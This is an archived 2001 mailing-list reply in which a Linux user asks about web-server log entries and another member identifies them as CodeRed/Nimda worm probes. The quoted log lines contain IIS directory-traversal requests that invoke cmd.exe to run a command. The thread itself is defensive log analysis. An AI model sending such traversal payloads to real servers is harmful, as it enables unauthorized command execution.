Re: [SLUG] repost: linux httpfacces.log

• Next message: Paul M Foster: "Re: [SLUG] Linux VM problems (and I'm so cool)"
• Previous message: Glen: "Re: [SLUG] repost: linux httpfacces.log"
• Maybe in reply to: Patrick Grantham: "[SLUG] repost: linux httpfacces.log"
• Next in thread: Paul M Foster: "Re: [SLUG] repost: linux httpfacces.log"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

At 09:29 PM 10/31/01 -0500, you wrote:
>here's an entry I have not seen before:
>24.95.191.93 - - [31/Oct/2001:11:33:36 -0500] "GET
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 332
>24.95.191.93 - - [31/Oct/2001:11:33:36 -0500] "GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 332
>
>
>what do you make of this?

It's more CodeRed / Nimda stuff. It's looking for a specific directory
(FrontPage extensions for IIS specific) then transversing to the cmd.exe to
execute commands.

VT

• Next message: Paul M Foster: "Re: [SLUG] Linux VM problems (and I'm so cool)"
• Previous message: Glen: "Re: [SLUG] repost: linux httpfacces.log"
• Maybe in reply to: Patrick Grantham: "[SLUG] repost: linux httpfacces.log"
• Next in thread: Paul M Foster: "Re: [SLUG] repost: linux httpfacces.log"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.3 : Fri Aug 01 2014 - 16:07:01 EDT